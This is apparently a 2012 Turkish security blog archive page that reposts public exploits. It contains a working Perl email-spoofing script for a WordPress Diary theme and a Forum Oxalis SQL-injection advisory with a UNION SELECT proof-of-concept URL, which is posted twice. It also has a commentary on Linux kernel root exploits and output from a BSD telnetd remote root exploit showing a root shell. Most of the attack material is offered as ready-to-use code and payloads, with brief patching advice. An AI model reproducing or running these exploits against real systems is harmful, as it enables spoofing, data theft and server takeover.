Archive for 17 Temmuz 2012

admin |

WordPress Diary Notebook Eklentisi ‘wp-content/themes/diary/sendmail.php’ bulunan açıkla aşağıdaki perl exploitle Email Spoofing yapılmasına imkan sağlıyor.

#!/usr/bin/perl

# Exploit Title: Diary/Notebook Site5 WordPress Theme – Email Spoofing

# Date: 15.07.2012

# Exploit Author:

# Discovered by: (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)

# Software Link: http://www.wpdiarytheme.com/

# Vendor Homepage: http://www.site5.com/

# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/

# Version: Not Documented

# Tested on: Linux 3.2

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Request::Common qw{ POST };

#Change this to the root of the WordPress

my $wordpress = ‘http://localhost/wordpress/’;

my $url = $wordpress.’wp-content/themes/diary/sendmail.php’;

#Name shows up in the topic of the email (Website contact message from name)

my $name =’Proof of Concept’;

#Sender email address

my $email = ‘’;

#Content of the email

my $comment = ‘Email content’;

#Receiver email address

my $receiver = ‘’;

$receiver =~ s/(.)/sprintf(“%x”,ord($1))/eg;

my $ua = LWP::UserAgent->new();

my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => ‘submit’, ] );

print “Sending request to $url\n”;

my $content = $ua->request($request)->as_string();

print $content;

print “\nDone\nFollow \ on Twitter\n”;

Category: Genel | Tags: ,
admin | 17 Temmuz 2012
No comments

Forum Oxalis

Forum Oxalis 0.1.2 Sql injection açığı yükser risk taşıyor. func.php de bulunan açık verilerin çekilmesine imkan tanıyor. Bu scripti kullananlar açığı bir an önce fixlemelidir.

#################################################

Forum Oxalis 0.1.2

#################################################

Discovered by: Jean Pascal Pereira

Vendor information:

“Forum Oxalis is a minimalis GPL PHP forum using CSS.”

Vendor URI: http://developer.berlios.de/projects/forumoxalis/

#################################################

Risk-level: High

The application is prone to a remote SQL injection vulnerability.

————————————-

func.php, line 72:

function lister_messages($id, $page, $parpage)

{

global $mysql_table;

$resu = mysql_query(“select * from `$mysql_table` where id=$id”);

$nombre_messages = mysql_num_rows($resu);

forum.php, line 7:

$id = $_GET[‘id’];

forum.php, line 74:

case “message”:

lister_messages($id, $page, $reponses_par_page);

$reponse_a_id = $id;

break;

————————————-

Exploit / Proof Of Concept:

http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message

————————————-

Solution:

Do some input validation.

————————————-

#################################################

Category: Genel | Tags: ,
admin | 17 Temmuz 2012
No comments

Forum Oxalis <= 0.1.2 SQL Injection Vulnerability

Forum Oxalis 0.1.2 Sql injection açığı yükser risk taşıyor. func.php de bulunan açık verilerin çekilmesine imkan tanıyor. Bu scripti kullananlar açığı bir an önce fixlemelidir.

#################################################

Forum Oxalis 0.1.2

#################################################

Discovered by: Jean Pascal Pereira

Vendor information:

“Forum Oxalis is a minimalis GPL PHP forum using CSS.”

Vendor URI: http://developer.berlios.de/projects/forumoxalis/

#################################################

Risk-level: High

The application is prone to a remote SQL injection vulnerability.

————————————-

func.php, line 72:

function lister_messages($id, $page, $parpage)

{

global $mysql_table;

$resu = mysql_query(“select * from `$mysql_table` where id=$id”);

$nombre_messages = mysql_num_rows($resu);

forum.php, line 7:

$id = $_GET[‘id’];

forum.php, line 74:

case “message”:

lister_messages($id, $page, $reponses_par_page);

$reponse_a_id = $id;

break;

————————————-

Exploit / Proof Of Concept:

http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message

————————————-

Solution:

Do some input validation.

————————————-

#################################################

Category: Genel | Tags: ,
admin | 13 Temmuz 2012
No comments

Linux Kernel x86_64 Local Root Exploit

Bilindiği üzere Linux Kernel 2.6.18.x x86_64 Temmuz 2010 tarihinde oday olarak kingcope tarafından yayınlanmış  bu exploitten çok yüksek sayıda hosting etkilenmişti. x86_64 2012 yamalarını yüklemeyen hostingler hala daha azda olsa etkilenmektedir.

Aynı tarihlerde gene  lilux kernel 2.6.32. x serisi için yayınlanan local root exploitte aynı şekilde çok etkili olmuştu, gene Ubuntu sürümlerinde de local root exploitler kasıp kavurmuştu.

İki yıldır 2008 2009 2010 yılında çıkan Linux kernel Local Root exploitleri kadar etkili exploitler public edilmememektedir. İki yıldır windows local ve remote exploitleri üzerinde çalışmaların daha fazla olduğu görülmektedir.

Local root exploitlerin yerini linux ve windows remote root exploitleri almış olsada, etkileri oldukça azalmıştır.

İki yıllık beklemenin ardından çıkabilecek bir local root exploit linux sunucuları oldukça zor durumlarda bırakacaktır.

Linux hostinglerin linux kernel güncellemelerini yakından takip etmelerini ve kerneli devamlı güncel tutmaları tarafımdan önerilir.

Category: Genel | Tags: , ,
admin | 12 Temmuz 2012
No comments

BSD telnetd Remote Root Exploit

BSD telnetd Remote Root Exploit *ZERODAY*

By Kingcope
Year 2011
usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
        [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
[port]]
TARGETS:
0 FreeBSD 8.2 i386
1 FreeBSD 8.0/8.1/8.2 i386
2 FreeBSD 7.3/7.4 i386
3 FreeBSD 6.2/6.3/6.4 i386
4 FreeBSD 5.3/5.5 i386
5 FreeBSD 4.9/4.11 i386
6 NetBSD 5.0/5.1 i386
7 NetBSD 4.0 i386
8 FreeBSD 8.2 amd64
9 FreeBSD 8.0/8.1 amd64
10 FreeBSD 7.1/7.3/7.4 amd64
11 FreeBSD 7.1 amd64
12 FreeBSD 7.0 amd64
13 FreeBSD 6.4 amd64
14 FreeBSD 6.3 amd64
15 FreeBSD 6.2 amd64
16 FreeBSD 6.1 amd64
17 TESTING i386
18 TESTING amd64
Trying 192.168.2.8...
Connected to 192.168.2.8.
Escape character is '^]'.
Trying SRA secure login:
*** EXPLOITING REMOTE TELNETD
*** by Kingcope
*** Year 2011
USING TARGET -- FreeBSD 8.2 amd64
SC LEN: 30
ALEX-ALEX
6:36PM  up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
USER             TTY      FROM              LOGIN@  IDLE WHAT
kcope            pts/0    192.168.2.3       6:32PM     4 _su (csh)
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
02:41:51 UTC 2011
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Category: Genel | Tags: ,
« Older Entries   Recent Entries »